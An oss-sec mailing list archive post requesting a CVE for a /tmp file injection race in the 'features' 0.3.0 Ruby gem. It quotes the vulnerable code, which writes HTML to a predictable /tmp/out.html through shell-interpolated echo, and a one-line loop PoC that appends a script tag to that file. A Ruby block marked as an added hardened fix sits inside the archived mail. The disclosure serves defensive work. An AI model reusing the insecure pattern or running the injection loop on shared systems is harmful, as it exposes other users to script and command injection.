oss-sec mailing list archives
Features 0.3.0 Ruby gem /tmp file injection vulnerability
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Mon, 09 Sep 2013 17:38:46 +0000 (GMT)
Hi,

May I have a CVE for the following vulnerability?

Title: Features 0.3.0 Ruby gem /tmp file injection vulnerability
Date: 9/1/2013
Author: Larry W. Cashdollar @_larry0
Download: http://rubygems.org/gems/features
CVE: TBD

Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C"

Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html

A malicious user who creates /tmp/out.html first and repeatedly writes to it can inject malicious HTML into the file right before it is about to be opened.

PoC:

  nobody () sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done

Will pop up a JavaScript alert in other gem users' browsers.

Code:

Vulnerable code in ./features-0.3.0/lib/suite.rb

      html = parse_results(results).html
      %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
    end

    def parse_results_and_open_in_safari(results)
  --
    end

    def open_in_safari(html)
      %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
    end

Vendor: Not notified
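A hardened form of the open_in_safari helper quoted in the advisory above, written here as an added example (it is not the gem's own code and not part of the original mail). It assumes the macOS `open` command as the viewer; the `opener` argument lets a caller substitute another launcher or a no-op.

```ruby
require 'tempfile'
require 'tmpdir'

# Launches the viewer with the argv form of system, so the path is passed as
# one argument and no shell ever parses it (assumes the macOS `open` command).
OPEN_WITH_OS = ->(path) { system('open', path) }

# Safer replacement for open_in_safari: writes the HTML report to a file that
# another local user cannot have pre-created, cannot append to and cannot read.
#
#  * Tempfile.create opens a uniquely named file with O_CREAT|O_EXCL and mode
#    0600; a pre-created /tmp/out.html or a planted symlink is simply never
#    used, which removes the race the advisory describes.
#  * The HTML goes through Ruby file I/O, never through `echo '#{html}'` on a
#    shell command line, so quotes or backticks in a story name cannot
#    terminate the echo and run as commands.
#  * Returns the path; the caller deletes the file once the viewer has loaded it
#    (no block form here, because `open` returns before the browser reads it).
def write_report_safely(html, dir: Dir.tmpdir, opener: OPEN_WITH_OS)
  f = Tempfile.create(['features-report-', '.html'], dir)
  begin
    f.write(html)
  ensure
    f.close
  end

  # Re-check before handing the path to a viewer: still a regular file with no
  # group/other permission bits, i.e. nothing was swapped in underneath us.
  st = File.lstat(f.path)
  unless st.file? && (st.mode & 0o077).zero?
    File.delete(f.path) rescue nil
    raise "refusing to open #{f.path}: unexpected type or permissions"
  end

  opener.call(f.path)
  f.path
end

if __FILE__ == $0
  # Constructed sample containing the characters that would have broken the
  # shell-interpolated version; shown with a no-op opener so it runs anywhere.
  path = write_report_safely("<h1>Results</h1><p>it's 'done' `now`</p>", opener: ->(_) {})
  puts "report written to #{path} (mode #{'%o' % (File.stat(path).mode & 0o777)})"
  File.delete(path)
end
```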
Current thread:
- Features 0.3.0 Ruby gem /tmp file injection vulnerability Larry W. Cashdollar (Sep 09)
- Re: Features 0.3.0 Ruby gem /tmp file injection vulnerability Kurt Seifried (Sep 09)
- Re: Features 0.3.0 Ruby gem /tmp file injection vulnerability Henri Salo (Sep 10)
- <Possible follow-ups>
- Re: Features 0.3.0 Ruby gem /tmp file injection vulnerability Larry W. Cashdollar (Sep 10)